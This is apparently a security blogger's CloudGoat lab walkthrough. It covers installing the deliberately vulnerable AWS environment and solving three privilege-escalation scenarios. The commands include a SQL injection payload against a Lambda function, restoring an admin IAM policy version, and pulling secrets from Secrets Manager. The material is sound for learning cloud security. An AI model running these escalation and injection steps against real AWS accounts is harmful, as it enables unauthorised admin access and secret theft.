Cloud Security


Hi Everyone

I’m back with another blog on Deep Dive into AWS Cloud Security from scratch.

What is Cloud Security ?

  • Cloud security is a set of policies, strategies, controls, procedures, and practices designed to safeguard the data, resources, and applications hosted on the cloud.

Why to Learn Cloud Security ?

  • Cloud security is critical since most organizations are already using cloud computing in one form or another.
  • Worldwide end-user spending on public cloud services is forecast to grow 20.4% in 2022 to total $494.7 billion, up from $410.9 billion in 2021, according to the latest forecast from Gartner, Inc

Top Cloud Providers

From the above statistics, it shows Amazon AWS dominates the cloud industry, so i decided to start with AWS Cloud Security, but :(

So i started to look where i can create and deploy a vulnerable cloud enviroment for learning,i end up by finding CloudGoat.

CloudGoat(☁️🐐)

CloudGoat is Rhino Security Labs "Vulnerable by Design" AWS deployment tool.

Set-Up Requirements

  1. Linux or Mac OS
  2. Python 3.6+
    apt install python3
    
  3. Terraform
    curl -fsSL https://apt.releases.hashicorp.com/gpg | sudo apt-key add -
    sudo apt-add-repository "deb [arch=amd64] https://apt.releases.hashicorp.com $(lsb_release -cs) main"
    sudo apt-get update && sudo apt-get install terraform
    
  4. AWS CLI
    curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
    unzip awscliv2.zip
    sudo ./aws/install
    
  5. jq
    apt install jq
    

    Creating an AWS Administrator Account

    • Sign Up for an Amazon AWS Account.
    • After login, search for Identity & Access Management (IAM).
    • Choose Users —> Add users

  • Set username and choose AWS Credentials Type as Programmatic Access.

  • Choose Attach existing policies directly —> AdministratorAccess.

  • Give any tag name as shown below.

  • Review all the setting once and click on Create User.

Configuring AWS Profile

  • After creating the AWS Administrator Account use the following command to configure the AWS profile.
aws configure --profile cloudgoat #give any profile name

  • Check if the user is configured with the AWS access key and Secret Key to the corresponding profile.
aws iam get-user --profile cloudgoat

Installing CloudGoat

To install CloudGoat, make sure your system meets the requirements above.

git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
pip3 install -r ./requirements.txt

Configuring CloudGoat

  • Configure cloudgoat with the AWS profile, use the following command.
./cloudgoat.py config profile
  • Whitelist the IP-Address automatically.
./cloudgoat.py config whitelist --auto

Let's get started

Scenario: Vulnerable Lambda

Command: ./cloudgoat.py create vulnerable_lambda

Scenario Resources

1 IAM User
1 IAM Role
1 Lambda
1 Secret

Scenario Start

IAM User ‘bilbo’

Scenario Goal

Find the scenario’s secret. (cg-secret-XXXXXX-XXXXXX)

Summary

In this scenario, you start as the ‘bilbo’ user. You will assume a role with more privelages, discover a lambda function that applies policies to users, and exploit a vulnerability in the function to escalate the privelages of the bilbo user in order to search for secrets.

Exploitation Route

Walkthrough - IAM User “bilbo”

  • Configure the AWS Profile for bilbo using the following command
aws configure --profile bilbo

  • Get permissions for the ‘bilbo’ user.
#This command will give you the ARN & full name of you user.
aws --profile bilbo --region us-east-1 sts get-caller-identity
#This command will list the policies attached to your user.
aws --profile bilbo --region us-east-1 iam list-user-policies --user-name [your_user_name]
#This command will list all of your permissions.
aws --profile bilbo --region us-east-1 iam get-user-policy --user-name [your_user_name] --policy-name [your_policy_name]

  • List all roles, assume a role for privesc.
#This command will list all the roles in your account, one of which should be assumable. 
aws --profile bilbo --region us-east-1 iam list-roles | grep cg-
# This command will list all policies for the target role
aws --profile bilbo --region us-east-1 iam list-role-policies --role-name [cg-target-role]
# This command will get you credentials for the cloudgoat role that can invoke lambdas.
aws --profile bilbo --region us-east-1 sts assume-role --role-arn [cg-lambda-invoker_arn] --role-session-name [whatever_you_want_here]

  • Configure the newly AWS profile using the generated AWS Credentials.

  • Manually add the SessionToken.
vi .aws/credentials

  • List lambdas to identify the target (vulnerable) lambda.
    # This command will show you all lambda functions. The function belonging to cloudgoat (the name should start with "cg-")
    # can apply a predefined set of aws managed policies to users (in reality it can only modify the bilbo user).
    aws --profile assumed_role --region us-east-1 lambda list-functions
    

  • Look at the lambda source code. You should see the database structure in a comment, as well as the code that is handling input parameters. It’s vulnerable to an injection, and we’ll see what an exploit looks like in the next step.
#This command will return a bunch of information about the lambda that can apply policies to bilbo.
#part of this information is a link to a url that will download the deployment package, which
#contains the source code for the function. Read over that source code to discover a vulnerability. 
aws --profile assumed_role --region us-east-1 lambda get-function --function-name [policy_applier_lambda_name]

  • Invoke the role applier lambda function, passing the name of the bilbo user and the injection payload.
    #The following command will send a SQL injection payload to the lambda function
    aws --profile assumed_role --region us-east-1 lambda invoke --function-name [policy_applier_lambda_name] --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": [bilbo_user_name_here]}' out.txt
    #cat the results to confirm everything is working properly
    cat out.txt
    

  • Now that Bilbo is an admin, use credentials for that user to list secrets from secretsmanager.
    #This command will list all the secrets in secretsmanager
    aws --profile bilbo --region us-east-1 secretsmanager list-secrets
    

#This command will get the value for a specific secret
aws --profile bilbo --region us-east-1 secretsmanager get-secret-value --secret-id [ARN_OF_TARGET_SECRET]

Scenario: IAM Privesc by Rollback

Command: ./cloudgoat.py create iam_privesc_by_rollback

Scenario Resources

  • 1 IAM User
    • 5 policy versions

Scenario Start

IAM User “Raynor”

Scenario Goal

Acquire full admin privileges.

Summary

Starting with a highly-limited IAM user, the attacker is able to review previous IAM policy versions and restore one which allows full admin privileges, resulting in a privilege escalation exploit.

Exploitation Route

Walkthrough - IAM User “Raynor”

  • Configure the AWS Profile for raynor using the following command
aws configure --profile raynor

  • Get the username of the current AWS profile.
aws iam get-user --profile raynor

  • List the attached policies of the raynor user.
aws iam list-attached-user-policies --user-name [username] --profile raynor

  • View the Current Policy version.
aws iam get-policy --policy-arn <generatedARN>/cg-raynor-policy --profile raynor

  • Check the existing versions of the policy.
aws iam list-policy-versions --policy-arn <generatedARN>/cg-raynor-policy --profile raynor

Version 1

Note: An attacker with the iam:SetDefaultPolicyVersion permission may be able to escalate privileges through existing policy versions not currently in use. If a policy that they have access to has versions that are not the default, they would be able to change the default version to any other existing version.

Version 2

Note: The above shown policy allows all actions to all resources. This basically grants the user administrative access to the AWS account.

Version 3

Note: From the above image it can be observed that policy whitelists those two (2) IP subnets.

Version 4

Note: This policy allows this action “iam:Get*” to all AWS resources but only allows for a specified time period which has expired.

Version 5

Note: This allows only the following actions: “s3:ListBucket”, “s3:GetObject” and “s3:ListAllMyBuckets”.

  • Change the Policy Version from v1 —> v2 , because v2 has administrative privilege.
aws iam set-default-policy-version --policy-arn <generatedARN>/cg-raynor-policy --version-id <versionID> --profile raynor

  • Confirm the Administrative Privilege by creating a S3 Bucket.
aws s3api create-bucket --bucket [bucket-name] --region us-east-1 --profile raynor

Scenario: Lambda Privesc

Command: ./cloudgoat.py create lambda_privesc

Scenario Resources

1 IAM User
2 IAM Roles

Scenario Start

  1. IAM User Chris

Scenario Goal

Acquire full admin privileges.

Summary

Starting as the IAM user Chris, the attacker discovers that they can assume a role that has full Lambda access and pass role permissions. The attacker can then perform privilege escalation to obtain full admin access.

Note: This scenario may require you to create some AWS resources, and because CloudGoat can only manage resources it creates, you should remove them manually before running ./cloudgoat destroy.

Exploitation Route

Walkthrough - IAM User “Chris”

  • Configure the AWS Profile for chris using the following command
aws configure --profile chris

  • Get the username of the current AWS profile.
aws iam get-user --profile chris

  • List the attached policies of the chris user.
aws iam list-attached-user-policies --user-name [username] --profile Chris

  • View the Current Policy version.
aws iam get-policy --policy-arn [arn-number] --profile chris

  • Check the existing versions of the policy.
aws iam list-policy-versions --policy-arn <cg-chris-policy arn> --profile chris

  • Details of the v1 version.
aws iam get-policy-version --policy-arn <cg-chris-policy arn> --version-id v1 --profile Chris

Note: It was observed that sts:AssumeRole is allowed. So an attacker would be able to change the assume role policy document of any existing role to allow them to assume that role.It will return a set of temporary security credentials that you can use to access AWS resources that you may not have access to normally.

  • List the roles of chris profile.
aws iam list-roles --profile chris

Related Posts

Reconnaissance

Red Teamer Perspective

Vishing

Social Engineering Tactics to Convince Victims

Phishing

Set-up and run a Phishing Campaign using GoPhish

Hopper Disassembler

Bypassing Jail Break Detection

How I was able to revoke your Instagram 2FA

Bypassing Rate Limit using IP Rotation

Dependency Confusion

The Story of Supply Chain Attack

Hack with Automation !!!

Security Automation, (re) defined

Demystifying Insecure Deserialisation on JSF Application

JSF Viewstate Deserialisation

Exploiting Out-Of-Band XXE on Wildfire

Data Exfiltration using XXE via HTTP LOCK Method

Cyber-Gym 4.0 CTF Writeup

Detailed writeup of Internal CTF